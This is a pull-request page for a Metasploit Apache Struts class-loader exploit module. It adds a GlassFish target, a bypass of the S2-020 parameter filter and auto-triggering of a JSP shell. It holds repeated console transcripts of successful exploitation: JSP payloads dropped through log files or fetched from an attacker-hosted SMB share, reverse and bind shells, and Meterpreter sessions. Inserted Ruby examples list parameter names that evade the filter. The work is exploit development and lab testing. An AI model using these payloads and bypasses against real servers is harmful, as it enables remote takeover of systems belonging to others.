
Add improvements for docBase exploitation vector #4890

Merged: 4 commits, Mar 12, 2015

Conversation

julianvilas (Contributor)

Added the following improvements to the module:

  • Added the GlassFish app server as a target
  • Added a bypass for S2-020 (fixed in S2-021)
  • Made the UNC resource (share, file name and folder) random, but using the ".jsp" extension
  • Added auto-triggering of the JSP shell

Testing env:

  • rev: a13cd2b
  • Windows XP
  • Tomcat 7.0.59
msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.17.1.63                yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.17.1.3       yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   3   Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)
msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started reverse handler on 172.17.1.3:4444 
[*] Server started.
[*] JSP payload available on \\172.16.218.197\bnekdX\crNveL.jsp...
[*] 172.17.1.63:8080 - Modifying Class Loader...
[*] 172.17.1.63:8080 - Accessing JSP shell at /hello_world/crNveL.jsp...
[*] Command shell session 1 opened (172.17.1.3:4444 -> 172.17.1.63:3545) at 2015-03-07 20:37:20 +0100
[*] Server stopped.

Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test>
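
The S2-020 bypass mentioned in the description comes down to the regular expression Struts used to filter incoming parameter names. The Ruby below is an added example, not code from this PR or from Metasploit. The two patterns are transcribed from memory of Struts' struts-default.xml for 2.3.16.1 (the S2-020 fix) and 2.3.16.2 (the S2-021 fix) and should be checked against the copy inside the struts2-core jar actually deployed; the parameter names it feeds them are constructed for the demonstration. It replays the `excludeParams` check to show which spellings of the docBase property chain the S2-020 pattern still accepted and that the S2-021 pattern rejects them, which is also the check to run on a custom `excludeParams` list before trusting it.

```ruby
# Added example (not from this PR or Metasploit): replay Struts 2's
# ParametersInterceptor excludeParams check for the class-loader patterns.
# Both regexes are transcribed from memory of struts-default.xml and must be
# verified against the struts2-core jar you run. Java's Pattern.matches()
# demands a whole-string match, so the Ruby versions are anchored with \A..\z.

# Struts 2.3.16.1 (S2-020 fix): only lower-case "class" followed by a dot.
S2_020_CLASS_EXCLUDE = /\A(?:.*\.|^)class\..*\z/

# Struts 2.3.16.2 (S2-021 fix): either case, dot or bracket access.
S2_021_CLASS_EXCLUDE = /\A(?:.*\.|^|.*|\[('|"))(?:c|C)lass(?:\.|('|")\]|\[).*\z/

# Constructed parameter names: the original docBase vector, two spellings
# OGNL resolves to the same getClass().getClassLoader() chain, and a benign
# form field for contrast.
SAMPLE_PARAMS = [
  'class.classLoader.resources.dirContext.docBase',
  'Class.classLoader.resources.dirContext.docBase',
  "class['classLoader']['resources']['dirContext']['docBase']",
  'name',
].freeze

# Mirrors ParametersInterceptor.isExcluded: true when any pattern matches.
def excluded?(patterns, param_name)
  patterns.any? { |p| p.match?(param_name) }
end

# Parameter names that survive the exclude list and reach the OGNL setter.
def accepted_params(patterns, names = SAMPLE_PARAMS)
  names.reject { |n| excluded?(patterns, n) }
end

if __FILE__ == $0
  { 'S2-020 (2.3.16.1)' => [S2_020_CLASS_EXCLUDE],
    'S2-021 (2.3.16.2)' => [S2_021_CLASS_EXCLUDE] }.each do |label, pats|
    puts "#{label} still accepts: #{accepted_params(pats).inspect}"
  end
end
```

With the S2-020 pattern, `Class.classLoader...` (capital C) and the bracket form `class['classLoader']...` both pass because the regex is case-sensitive and insists on a dot right after `class`; the S2-021 pattern closes both gaps.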

@julianvilas (Contributor, Author)

There are two more things to fix:

  • The Java payload was not working for Tomcat 8
  • The cleanup of the JSP wasn't working because the expected CWD was wrong

I'm working on it too, will append the changes to this PR and let you know.

@julianvilas (Contributor, Author)

OK, Java payload for Tomcat 8 has been fixed too.

  • Ubuntu 14.04.01 - Linux ubuntu 3.13.0-32-generic Nexpose #57-Ubuntu SMP (x86-64)
  • apache-tomcat-8.0.18
  • git rev: a13cd2b
    • java version "1.7.0_76"

Native meterpreter:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.194             yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         172.16.218.194   no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] 172.16.218.194:8080 - Modifying Class Loader...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[*] 172.16.218.194:8080 - Countdown 6...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/lrO472.jsp
[*] 172.16.218.194:8080 - Generating JSP...
[*] 172.16.218.194:8080 - Dumping JSP into the logfile...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/lrO472.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 172.16.218.194
[*] Meterpreter session 1 opened (172.16.218.1:53415 -> 172.16.218.194:4444) at 2015-03-10 00:04:15 +0100
[+] Deleted webapps/ROOT/lrO472.jsp
[+] Deleted GzdBW

ARCH_JAVA:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.194             yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (java/jsp_shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.218.194   no        The target address
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Java

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] 172.16.218.194:8080 - Modifying Class Loader...
[*] Started bind handler
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/BYBs35.jsp
[*] 172.16.218.194:8080 - Generating JSP...
[*] 172.16.218.194:8080 - Dumping JSP into the logfile...
[*] 172.16.218.194:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.194:8080 - Countdown 10...
[*] 172.16.218.194:8080 - Countdown 9...
[*] 172.16.218.194:8080 - Countdown 8...
[*] 172.16.218.194:8080 - Countdown 7...
[*] 172.16.218.194:8080 - Countdown 6...
[*] 172.16.218.194:8080 - Countdown 5...
[+] 172.16.218.194:8080 - Log file flushed at http://172.16.218.194:8080/BYBs35.jsp
[*] Command shell session 3 opened (172.16.218.1:53507 -> 172.16.218.194:4444) at 2015-03-10 00:06:36 +0100
[+] Deleted webapps/ROOT/BYBs35.jsp

2945551580
DxTDEUjVusPonXZYzttQFIHvuoQxNxEX
uidGkuWURRIfXvWwYDXQarIBbITnJoiE

  • Windows XP
  • apache-tomcat-8.0.20
  • git rev: a13cd2b
    • java version "1.7.0_75"

Native meterpreter:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.148             yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.16.218.148   no        The target address


Exploit target:

   Id  Name
   --  ----
   2   Windows


msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] 172.16.218.148:8080 - Modifying Class Loader...
[*] 172.16.218.148:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.148:8080 - Countdown 10...
[*] 172.16.218.148:8080 - Countdown 9...
[*] 172.16.218.148:8080 - Countdown 8...
[+] 172.16.218.148:8080 - Log file flushed at http://172.16.218.148:8080/L4lBc29.jsp
[*] 172.16.218.148:8080 - Generating JSP...
[*] 172.16.218.148:8080 - Dumping JSP into the logfile...
[*] 172.16.218.148:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.148:8080 - Countdown 10...
[*] 172.16.218.148:8080 - Countdown 9...
[*] 172.16.218.148:8080 - Countdown 8...
[*] 172.16.218.148:8080 - Countdown 7...
[+] 172.16.218.148:8080 - Log file flushed at http://172.16.218.148:8080/L4lBc29.jsp
[*] Sending stage (770048 bytes) to 172.16.218.148
[*] Meterpreter session 10 opened (172.16.218.1:54145 -> 172.16.218.148:4444) at 2015-03-10 00:40:17 +0100
[!] This exploit may require manual cleanup of 'webapps/ROOT/L4lBc29.jsp' on the target
[!] This exploit may require manual cleanup of 'lyXD' on the target

meterpreter > exit

ARCH_JAVA:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.218.148             yes       The target address
   RPORT           8080                       yes       The target port
   SMB_DELAY       10                         yes       Time that the SMB Server will wait for the payload request
   SRVHOST         0.0.0.0                    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT         445                        yes       The local port to listen on.
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (java/jsp_shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.218.148   no        The target address
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Java


msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] 172.16.218.148:8080 - Modifying Class Loader...
[*] Started bind handler
[*] 172.16.218.148:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.148:8080 - Countdown 10...
[*] 172.16.218.148:8080 - Countdown 9...
[*] 172.16.218.148:8080 - Countdown 8...
[*] 172.16.218.148:8080 - Countdown 7...
[*] 172.16.218.148:8080 - Countdown 6...
[+] 172.16.218.148:8080 - Log file flushed at http://172.16.218.148:8080/Tiar05.jsp
[*] 172.16.218.148:8080 - Generating JSP...
[*] 172.16.218.148:8080 - Dumping JSP into the logfile...
[*] 172.16.218.148:8080 - Waiting for the server to flush the logfile
[*] 172.16.218.148:8080 - Countdown 10...
[*] 172.16.218.148:8080 - Countdown 9...
[*] 172.16.218.148:8080 - Countdown 8...
[*] 172.16.218.148:8080 - Countdown 7...
[+] 172.16.218.148:8080 - Log file flushed at http://172.16.218.148:8080/Tiar05.jsp
[*] Command shell session 1 opened (172.16.218.1:54237 -> 172.16.218.148:4444) at 2015-03-10 00:48:28 +0100
[+] Deleted webapps/ROOT/Tiar05.jsp

Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test>echo 334169013;echo hstrXPISPRrOsxkrltZkdLxYpojGVeOU
334169013;echo hstrXPISPRrOsxkrltZkdLxYpojGVeOU

C:\Documents and Settings\test>
C:\Documents and Settings\test>rm -f "webapps/ROOT/Tiar05.jsp" >/dev/null ; echo ' & attrib.exe -r "webapps\ROOT\Tiar05.jsp" & del.exe /f /q "webapps\ROOT\Tiar05.jsp" & echo " ' >/dev/null;echo CfrTXOzQzuioWCRjNdLiStpREfOHuEtC
The system cannot find the path specified: C:\Documents and Settings\test\webapps\ROOT
" ' >/dev/null;echo CfrTXOzQzuioWCRjNdLiStpREfOHuEtC

C:\Documents and Settings\test>

@julianvilas (Contributor, Author)

The auto-cleanup doesn't work reliably.

Native binaries must always be cleaned up in the current directory, because that is where they are created. This works fine on Linux; however, on Windows the file is not being cleaned up (it seems to be because the file is still open by the process).

The JSP location is always "$TOMCAT_HOME/webapps/ROOT". For this reason a relative path to it depends on the current CWD value. The bad thing here is that, as stated in #4667, the user could think that the file has been deleted while it hasn't.
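
To make the CWD dependence concrete, here is an added Ruby example; it is not code from this PR or from Metasploit. It resolves the relative cleanup path `webapps/ROOT/<name>.jsp` against the working directories seen in the transcripts above (the Tomcat 8 shell running from `C:\apache-tomcat-8.0.20`, and the XP shell running from `C:\Documents and Settings\test`) and reports whether the deletion would hit the file the server really serves from `$TOMCAT_HOME/webapps/ROOT`. The Linux Tomcat home it uses is an assumption, since the Linux transcript never prints it. Tomcat publishes its base directory as the `catalina.base` system property, so a cleanup step that runs inside the JSP can build the absolute path from that instead of trusting the shell's CWD.

```ruby
# Added example, not from the PR or Metasploit: why a *relative* cleanup path
# such as "webapps/ROOT/Tiar05.jsp" only deletes the dropped JSP when the
# shell's working directory happens to be $TOMCAT_HOME, and what an absolute
# path built from the server's base directory looks like instead.

# True when the path looks like a Windows drive path (C:\...). Comparison is
# then case-insensitive, as NTFS is.
def windows_path?(path)
  !!(path =~ /\A[A-Za-z]:[\\\/]/)
end

# Join a relative path onto a directory using the directory's own separator.
def join_path(dir, relative)
  sep = windows_path?(dir) ? '\\' : '/'
  rel = relative.gsub(%r{[/\\]}) { sep }
  dir.chomp(sep) + sep + rel
end

# Canonical form for comparing two paths: one separator, lower-case on Windows.
def normalize_path(path)
  norm = path.gsub(%r{[/\\]}) { '/' }
  windows_path?(path) ? norm.downcase : norm
end

# Where the JSP really lives: the module drops it under $TOMCAT_HOME/webapps/ROOT,
# so the only reliable path is the absolute one rooted at the Tomcat home
# (available server-side as the catalina.base system property).
def actual_jsp_path(tomcat_home, jsp_name)
  join_path(tomcat_home, "webapps/ROOT/#{jsp_name}")
end

# Where a relative cleanup command run from `cwd` would look for it.
def relative_cleanup_path(cwd, jsp_name)
  join_path(cwd, "webapps/ROOT/#{jsp_name}")
end

# Does the relative cleanup hit the real file? Only if cwd == $TOMCAT_HOME.
def relative_cleanup_hits?(tomcat_home, cwd, jsp_name)
  normalize_path(relative_cleanup_path(cwd, jsp_name)) ==
    normalize_path(actual_jsp_path(tomcat_home, jsp_name))
end

if __FILE__ == $0
  # Constructed cases mirroring the PR's test runs. The Windows paths are the
  # ones shown in the transcripts; the Linux Tomcat home is an assumption.
  cases = [
    ['C:\apache-tomcat-8.0.20',   'C:\apache-tomcat-8.0.20',        'Tiar05.jsp'],
    ['C:\apache-tomcat-8.0.20',   'C:\Documents and Settings\test', 'Tiar05.jsp'],
    ['/opt/apache-tomcat-8.0.18', '/opt/apache-tomcat-8.0.18',      'lrO472.jsp'],
  ]
  cases.each do |home, cwd, jsp|
    verdict = relative_cleanup_hits?(home, cwd, jsp) ? 'deletes' : 'MISSES'
    puts "cwd=#{cwd.ljust(32)} relative cleanup #{verdict} #{actual_jsp_path(home, jsp)}"
  end
end
```

Only the second case misses: from `C:\Documents and Settings\test` the relative `del` resolves to `C:\Documents and Settings\test\webapps\ROOT\Tiar05.jsp`, which is exactly the "path not found" error in the XP transcript, while the module's success message would still suggest the file is gone.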

Inline review comment by @julianvilas (Contributor, Author) on this snippet:

register_files_for_cleanup(payload_file)
end

register_files_for_cleanup(payload_file)

Always use CWD; it is where the dropped binary should be.

@jvazquez-r7 (Contributor)

  • Tomcat 8
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:8080 - Modifying Class Loader...
[*] 172.16.158.134:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.134:8080 - Countdown 10...
[*] 172.16.158.134:8080 - Countdown 9...
[*] 172.16.158.134:8080 - Countdown 8...
[+] 172.16.158.134:8080 - Log file flushed at http://172.16.158.134:8080/gX74554.jsp
[*] 172.16.158.134:8080 - Generating JSP...
[*] 172.16.158.134:8080 - Dumping JSP into the logfile...
[*] 172.16.158.134:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.134:8080 - Countdown 10...
[*] 172.16.158.134:8080 - Countdown 9...
[*] 172.16.158.134:8080 - Countdown 8...
[*] 172.16.158.134:8080 - Countdown 7...
[+] 172.16.158.134:8080 - Log file flushed at http://172.16.158.134:8080/gX74554.jsp
[*] Sending stage (770048 bytes) to 172.16.158.134
[+] Deleted webapps/ROOT/gX74554.jsp
[!] This exploit may require manual cleanup of 'vJAY' on the target
meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > pwd
C:\apache-tomcat-8.0.20
meterpreter > exit
[*] Shutting down Meterpreter...
  • Tomcat 7
msf exploit(struts_code_exec_classloader) > set target 3
target => 3
msf exploit(struts_code_exec_classloader) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Server started.
[*] JSP payload available on \\172.16.158.1\PIZWKK\EnMyN.jsp...
[*] 172.16.158.134:8080 - Modifying Class Loader...
[*] SMB Share - 172.16.158.134 SMB_COM_NT_CREATE_ANDX for EnMyN.jsp, not found
[*] 172.16.158.134:8080 - Accessing JSP shell at /struts2-blank/example/EnMyN.jsp...
[*] SMB Share - 172.16.158.134 SMB_COM_NT_CREATE_ANDX request for \\172.16.158.1\PIZWKK\EnMyN.jsp...
[*] Server stopped.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\apache-tomcat-7.0.53>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 172.16.158.134
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 172.16.158.2

Ethernet adapter Bluetooth Network Connection:

        Media State . . . . . . . . . . . : Media disconnected

C:\apache-tomcat-7.0.53>

@jvazquez-r7 jvazquez-r7 merged commit fe822f8 into rapid7:master Mar 12, 2015
@julianvilas julianvilas deleted the redsadic-smbtrigger branch March 12, 2015 22:33
3 participants